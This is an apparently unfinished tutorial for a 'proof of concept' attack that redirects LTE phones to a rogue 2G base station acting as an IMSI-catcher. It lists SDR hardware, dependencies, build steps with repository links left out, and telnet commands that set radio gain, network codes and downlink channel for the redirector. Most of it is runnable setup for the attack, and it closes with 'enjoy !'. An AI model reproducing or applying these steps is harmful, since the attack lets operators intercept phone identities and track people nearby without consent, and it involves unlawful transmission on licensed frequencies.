Redirect attack from long term evolution (LTE 4G) to global system mobile (GSM 2G): article in progress
Install From Scratch:

Tested with :
LimeSDR-Mini + 2 Motorola (C1XX series osmocom-bb compatibles)
or BladeRF-xA4 + 2 Motorola
or BladeRF-xA4 + LimeSDR-Mini
Kali Linux 2019.4 (Gnome AMD64) (Docker)

Install the dependencies :

apt update

apt upgrade

apt install build-essential libgmp-dev libx11-6 libx11-dev flex libncurses5 libncurses5-dev libncursesw6 libpcsclite-dev zlib1g-dev libmpfr6 libmpc3 lemon aptitude libtinfo-dev libtool shtool autoconf git-core pkg-config make libmpfr-dev libmpc-dev libtalloc-dev libfftw3-dev libgnutls28-dev libssl1.0-dev libtool-bin libxml2-dev sofia-sip-bin libsofia-sip-ua-dev sofia-sip-bin libncursesw5-dev bison libgmp3-dev alsa-oss asn1c libdbd-sqlite3 libboost-all-dev libusb-1.0-0-dev python-mako python3-mako doxygen python-docutils cmake build-essential g++ libpython-dev python-numpy python3-numpy swig libsqlite3-dev libi2c-dev libwxgtk3.0-gtk3-dev freeglut3-dev composer phpunit python3-pip python-pip

pip install requests
pip3 install requests

4G Redirect

Clone or download the necessary repositories :

git clone tested with checkout dbaf4132f
git clone tested with checkout 67abec9
git clone (necessary even if you don’t have a blade) tested with checkout f03d8433
git clone (only if you have a BladeRF) tested with checkout 1c1e8aa
git clone tested with checkout 7371e68
git clone only if you have a LimeSDR) tested with checkout a5b3a10f
git clone tested with checkout 8e2808513
git clone tested with checkout 4d83c60
wget && tar zxvf polarssl-1.3.7-gpl.tgz
git clone tested with checkout 4bd673b

Compilation (same order for the compilation than from the git clone(s) or download)
cd dir_to_compile
(git submodule init && git submodule update) -> only for gnuradio
(cd host) -> only for uhd

mkdir build
cd build
cmake ..
make -j$nproc
make install

Then build 2G IMSI-Catcher
Build IMSI-catcher

Phone in 2G/3G/4G mode
This article is in progress and is just a PoC
The attack step are run the IMSI-catcher into arfcn 514 follow (see Build IMSI-catcher)
run the 4G redirector as follow

Shell #1

Shell #2
telnet localhost 30000
write rx_gain 30
write tx_gain 80
write mcc 215
write mnc 15
write band 7
write dl_earfcn 3350
(change with your ue values be careful that the earfcn is in the band)

Then switch the phone in airplane mode and in localhost:30000 (Shell #2)

wait… and when you have “ok” answer in shell #2 remove airplane mode and … enjoy !